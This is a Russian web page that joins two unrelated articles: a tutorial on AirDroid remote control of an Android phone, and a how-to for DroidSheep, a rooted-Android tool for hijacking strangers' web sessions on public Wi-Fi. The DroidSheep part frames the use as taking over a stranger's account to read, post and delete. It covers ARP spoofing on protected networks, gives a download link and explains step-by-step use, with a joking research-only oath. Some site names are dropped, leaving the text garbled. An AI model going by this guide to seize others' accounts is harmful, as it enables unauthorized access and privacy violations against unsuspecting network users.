Теперь, для использования камеры, нужно зайти со второго устройства на страницу AirDroid в пункт «Камера» и на экране появится изображение с камеры. Можно переключаться между основной и фронтальной камерами, включать подсветку, делать снимки и сохранять их в памяти ПК или Android.

Подключение к камере по Wi-Fi

Этим способом подключение к камере будет бесплатно, но, поскольку само Wi-Fi соединение требует нахождение обоих устройств в одной сети, то сфера применения функции будет значительно ограничена. И тем не менее, использование веб камеры поможет, например, контролировать поведение маленького ребёнка, находящегося неподалёку.

Пользоваться этой функцией совсем несложно: устанавливаем приложение AirDroid на смартфон, выполняем настройку, подключаемся к ПК по Wi-Fi (как описано выше), выбираем в главном меню программы соответствующий пункт.

Поиск Андроид-устройства

Кроме специальных приложений, которые используются для поиска утерянного гаджета, можно воспользоваться аналогичной функцией в программе. Для этого, запустив AirDroid на ПК, нажимаем в правом верхнем углу кнопку «Функции» и выбираем пункт «Настройки». Осталось включить функцию «Найти телефон». На предложение программы выполнить активацию администрации устройства, нажимаем кнопку «Активировать сейчас», затем «ОК».

После того, как удалённое подключение к Андроиду установлено, в веб интерфейсе приложения AirDroid открываем меню «Найти телефон». Здесь на карте мы увидим свой аппарат, и сможем включить звонок, либо заблокировать экран гаджета созданным паролем и удалить личные данные на своём планшете или телефоне. Премиум аккаунт позволяет передней камерой сделать снимок, чтобы увидеть лицо нарушителя в момент попытки разблокирования экрана.

Другие функции, которыми можно управлять удалённо

Как понятно из описания, после того, как выполнено удалённое подключение к Андроид, пользоваться сервисом очень легко – все доступные функции выведены на главный экран сервиса AirDroid, и всего одно нажатие на соответствующую иконку запускает нужный инструмент.

Какие действия ещё доступно совершать удалённо с помощью программы AirDroid:

• Передача фотоснимков между ПК и Android-устройством.
• Управление видео и музыкой на Андроиде – воспроизведение и передача между устройствами.
• Выбор любимых музыкальных треков в качестве рингтонов и их экспорт на смартфон или планшет.
• Просмотр экрана Android-гаджета в онлайн-режиме и возможность делать статистические скриншоты (нужны права «суперпользователя»).
• Открытие URL, который был введён в Андроид посредством Браузера по умолчанию.
• Обмен контентом, находящимся в буфере обмена между ПК и смартфоном.

*Примечание: в приложении AirDroid, в его бесплатной версии существуют ограничения – до 100Мб передачи данных в сутки. Премиум аккаунт ограничивает передачу до 1 Гб, при Wi-Fi подключении никаких ограничений нет.

В заключение предлагаем посмотреть видео о работе программы:

Источник: http://Grand-screen.com/blog/kak-podklyuchitsya-udalenno-k-telefonu-android/

Перехват аккаунтов пользователей в Wi-Fi-сетях с Android

В сети стала появляться информация о сниффере под любой рутованный смартфон или планшет на Андроиде (от 2.1), позволяющий ходить под чужими аккаунтами многих веб-сайтов, в том числе и ontakte в общественных сетях Wi-Fi. Речь идет о программе DroidSheep. О механизме ее работы и использовании поговорим подробнее.

Итак, что вообще делает программа?

Она перехватывает пакеты, ходящие в Wi-Fi сети, одним нажатием кнопки на Android-устройстве.

А причём тут пароли?

Допустим, некий Иннокентий вошёл в кафе выпить чашку кофе и полазить по фейсбуку. Вы запускаете DroidSheep и через некоторое время начинаете просматривать страницу Иннокентия. Смотреть его друзей. Читать его сообщения. Писать сообщения. Писать на стене. Удалить друзей. Удалить аккаунт Иннокентия… Даже не зная его лично.

Как это произошло?

Когда Иннокентий использует Wi-Fi-сеть, его ноутбук или смартфон отправляет все данные, предназначенные для , по воздуху на беспроводной маршрутизатор кафе. «По воздуху» в нашем случае означает «видимые всеми», Вы можете прочитать все данные, передаваемые Иннокентием.

Поскольку некоторые данные шифруются перед отправкой, пароль от вы прочитать не сможете, но чтобы Иннокентий не вводил свой пароль после каждого клика, посылает Иннокентию так называемый «идентификатор сессии» после входа в систему, которое Иннокентий посылает сайту при взаимодействии с ним.

Как правило, только Иннокентий знает этот идентификатор, так как он получает его в зашифрованном виде. Но когда он использует Wi-Fi в кафе, он распространяет свой идентификатор сессии по wi-fi для всех. Вы принимаете это идентификатор сессии и используете его: не может определить, если и Иннокентий, и Вы используете один идентификатор.

DroidSheep делает этот механизм простым в использовании, нужно просто запустить DroidSheep, нажать «Пуск» и подождать, пока кто-то начнет пользоваться одним из поддерживаемых веб-сайтов. «Прыгнуть» в чужую сессию можно лишь одним кликом по экрану. Вот и все.

Что нужно для запуска DroidSheep?

— Android-устройство версии старше 2.1 — Root-доступ — DroidSheep (QR-код и ссылка на загрузку в конце статьи)

Какие сайты DroidSheep поддерживает по умолчанию?

— Amazon.com — .com — Flickr.com — .com — Linkedin.com — Yahoo.com — Live.com — Google.com (незашифрованные) Но есть ещё и «общий» режим! Просто включите его, и DroidSheep будет фиксировать все аккаунты в сети! Успешно протестирована с огромным количество уже поддерживаемых аккаунтов и многих других (даже с WordPress и Joomla должны работать!)

Запароленные Wi-Fi сети

Для защищенных WPA/WPA2 Wi-Fi-сетей программа использует DNS-Spoofing атаки. ARP-Spoofing означает, что она заставляет все устройства в сети думать, что DroidSheep — маршрутизатор, и пропускает все данные через себя. Это может оказать существенное влияние на скорость работы сети, так что пользуйтесь с осторожностью.

Итак, как пользоваться?

Перед началом убедитесь, что ваш телефон поддерживает root, без него программа работать не будет! Установка:

С сайта автора — http://droidsheep.de/?page_id=23

Или по QR-коду —

Использование:

Убедитесь, что ваш телефон подключен к WiFi-сети, запустите DroidSheep и нажмите кнопку «Start». Теперь DroidSheep будет прослушивать сеансы. Как только он перехватил маркер сеанса, он покажет его как запись в списке. По умолчанию, DroidSheep перехватывает аккаунты только тех сервисов, которые знает (, Yahoo, Google, …).

Если вы хотите, чтобы перехватывались все учетные записи в сети, включите «Общий режим» — просто нажмите кнопку «меню» в телефоне и нажмите «Включить режим Generic». Примечание: В Generic режиме DroidSheep фиксирует все наборы cookies в сети, но многие из них не относятся к учетной записи, а потому не позволят вам войти в чужой аккаунт, а будут просто отображаться в программе в списке.

Если вы перехватили хождение по нескольким сайтам, вы увидите список как на картинке. Аккаунты, определяемые DroidSheep по умолчаню окрашены в зеленый, перехваченные в общем режиме — в желтый.

В общем режиме появятся и не нужные вам сайты, типа рекламных, их можно добавить в черный список, чтобы не видеть их в программе. Для очистки всего черного списка перейдите в главное меню, нажмите меню и выберите «очистить черный список». Вот и всё!

Как использовать программу (видео): droidsheep.de/?page_id=14

И последнее.
Быстро все подняли руку и сказали: «Я клянусь, что буду пользовать программу только для исследования работы протоколов сети»

P.S. С Маркета можно скачать и «защитник» от DroidSheep DroidSheepGuard — market.android.com/details?id=de.trier.infsec.koch.droidsheep.guard.free

Источник: https://habr.com/post/127566/